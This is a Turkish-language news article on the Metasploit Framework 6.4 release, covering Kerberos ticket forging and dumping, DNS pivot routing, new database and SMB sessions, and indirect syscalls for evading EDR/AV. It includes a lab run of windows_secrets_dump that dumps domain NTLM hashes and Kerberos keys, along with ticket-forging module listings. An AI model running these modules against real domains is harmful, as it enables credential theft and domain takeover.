Metasploit'in en son sürümü olan Framework 6.4, devam eden bu savaşın bir kanıtıdır. Siber güvenliğin ön saflarına bir dizi yeni özellik ve iyileştirme getiriyor.
Metasploit'in 6.3 sürümünü yayınlamasından bu yana bir yıldan biraz fazla zaman geçti ve Rapid7'deki ekip boş durmadı.
Metasploit Framework'ün yeni 6.4 sürümü, selefinin sağlam temelleri üzerine inşa edilen önemli geliştirmeler ve yeni yetenekler sunuyor.
Bu sürüm, Metasploit'in penetrasyon test uzmanları ve siber güvenlik profesyonelleri için en yeni araçları sağlama konusundaki kararlılığının altını çiziyor.
Kerberos İyileştirmeleri
Bu sürümün öne çıkan özelliklerinden biri Kerberos kimlik doğrulama desteğinde yapılan önemli iyileştirmelerdir.
Sürüm 6.3'te sunulan ilk desteğin üzerine inşa edilen Metasploit 6.4, orijinal altın ve gümüş tekniklerinin yanı sıra elmas ve safir tekniklerine yönelik destek de dahil olmak üzere yeni yetenekler ekliyor.
Ücretsiz Web Semineri: Güvenlik Açığı ve 0 Günlük Tehditlerin Azaltılması
Güvenlik ekiplerinin 100'lerce güvenlik açığını önceliklendirmesi gerekmediğinden, hiç kimseye yardımcı olmayan Uyarı Yorgunluğu. :
- Günümüzün kırılganlık yorgunluğu sorunu
- CVSS'ye özgü güvenlik açığı ile risk tabanlı güvenlik açığı arasındaki fark
- Güvenlik açıklarının iş etkisine/riskine göre değerlendirilmesi
- Uyarı yorgunluğunu azaltmak ve güvenlik duruşunu önemli ölçüde geliştirmek için otomasyon
Riski doğru bir şekilde ölçmenize yardımcı olan AcuRisQ:
Yerinizi ayırtın
Bu güncelleme, en son Windows hedeflerine ayak uydurarak Windows Server 2022 ile uyumluluğu sağlar.
Rapid7'nin yakın tarihli bir makalesine göre Metasploit yakın zamanda Metasploit Framework 6.4'ün lansmanını duyurdu.
Ayrıca Metasploit 6.4, popüler Rubeus aracının sunduğu işlevselliğe benzer şekilde, kullanıcıların ele geçirilen bir ana bilgisayardan Kerberos biletlerini boşaltmasına olanak tanıyan yeni bir modül sunuyor.
Bu geliştirme, Kısıtlanmamış Yetkilendirme örneklerinden yararlanmak için faydalıdır ve siber güvenlik profesyonellerinin kullanabileceği araç setini daha da genişletir.
Çalıştırma örneği gather/windows_secrets_dump
Kerberos kimlik doğrulamalı modül ve DOMAIN
aksiyon:
msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/[email protected] [email protected]
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…
# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
…
# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…
# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…
[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed
Rapid7'de Baş Bilim Adamı olan Raj Samani, yakın zamanda Metasploit Çerçevesi'nin 6.4 versiyonunun başarılı bir şekilde yayınlanmasındaki olağanüstü çalışmaları için Metasploit ekibine ve topluluğuna şükranlarını ifade eden bir tweet attı.
DNS Yapılandırması ve Yeni Oturum Türleri
Bir diğer önemli gelişme ise Metasploit çerçevesinde DNS sorgularının geliştirilmiş şekilde işlenmesidir.
Bu güncelleme, kullanıcıların ana bilgisayar adlarının nasıl çözümleneceğini yapılandırmasına olanak tanır; bu, özellikle pivot senaryolarında faydalıdır.
Bu, dahili kaynaklara yönelik DNS sorgularının kullanıcının sistemi yerine güvenliği ihlal edilmiş bir ana bilgisayardan gelmesini sağlayarak operasyonel güvenliği artırır.
Metasploit 6.4 ayrıca yeni PostgreSQL, MSSQL, MySQL ve SMB oturum türlerini de sunuyor. Bu oturum türleri, uzak veritabanı örnekleriyle etkileşimli sorgulara ve dosya yükleme ve indirme yetenekleri de dahil olmak üzere SMB paylaşımlarıyla doğrudan etkileşime olanak tanır.
Bu ekleme, birden fazla modülün tek bir oturumda çalıştırılmasını kolaylaştırarak verimliliği ve etkililiği artırır.
DNS yapılandırmasını değiştirme örnekleri:
dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1
Geçerli yapılandırmayı görüntüleme:
msf6 > dns print
Default search domain: N/A
Default search list:
* tor.example.com
* localdomain
Current cache size: 0
Resolver rule entries
=====================
# Rule Resolver Comm channel
- ---- -------- ------------
1 *.lab.lan 192.0.2.1 Session 1
2 honeypot.lab.lan black-hole N/A
3 *
. \_ static N/A
. \_ 10.4.5.45
. \_ 10.3.20.98
Static hostnames
================
Hostname IPv4 Address IPv6 Address
-------- ------------ ------------
example.lab.lan 192.0.2.200
example2.lab.lan 192.0.2.201
Dolaylı Sistem Çağrıları Desteği ve Keşfedilebilirlik İyileştirmeleri
Metasploit 6.4, güvenlik yazılımı tarafından EDR/AV tespitini atlamak ve dinamik analizden kaçınmak için sıklıkla kullanılan bir teknik olan dolaylı sistem çağrılarını destekler.
Bu güncelleme, Win32 API çağrılarını ilgili yerel API'lere dolaylı sistem çağrılarıyla değiştirmeye ve Metasploit ile yürütülen operasyonların gizliliğini artırmaya odaklanıyor.
Metasploit 6.4, kullanıcıların çerçeve içindeki geniş modül dizisinde gezinmesine yardımcı olmak için modül keşfedilebilirliğine yönelik iyileştirmeler sunar.
Yeni Hiyerarşik Arama özelliği, modüllerdeki ek alanları eşleştirerek kullanıcıların görevleri için ihtiyaç duydukları araçları bulmalarını kolaylaştırır.
Örnek olarak, bu şuna neden olacaktır: auxiliary/admin/kerberos/forge_ticket
Kullanıcı aradığında görünecek modül forge_golden
çünkü bu modülün bir eylemidir:
msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/kerberos/forge_ticket . normal No Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging
1 \_ action: FORGE_DIAMOND . . . Forge a Diamond Ticket
2 \_ action: FORGE_GOLDEN . . . Forge a Golden Ticket
3 \_ action: FORGE_SAPPHIRE . . . Forge a Sapphire Ticket
4 \_ action: FORGE_SILVER . . . Forge a Silver Ticket
5 \_ AKA: Ticketer . . . .
6 \_ AKA: Klist . . . .
7 auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal No MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Interact with a module by name or index.
For example, info 7, use 7 or use auxiliary/admin/Kerberos/ms14_068_kerberos_checksum
msf6 auxiliary(scanner/mysql/mysql_hashdump) >
Metasploit Framework 6.4'ün piyasaya sürülmesi, en yaygın kullanılan penetrasyon testi araçlarından birinin geliştirilmesinde başka bir kilometre taşıdır.
Metasploit, yeni özellikleri ve iyileştirmeleriyle siber güvenlik profesyonellerini dijital dünyada sürekli gelişen tehditlere karşı korunmak için ihtiyaç duydukları araçlarla donatmaya devam ediyor.
Siber tehditlerin karmaşıklığı arttıkça, Metasploit Framework 6.4 gibi araçlar dünya çapındaki dijital altyapıların güvenliğini sağlamak için hayati öneme sahiptir.
Siber Güvenlik haberleri, Teknik İncelemeler ve İnfografiklerden haberdar olun. Bizi LinkedIn'de takip edin & heyecan.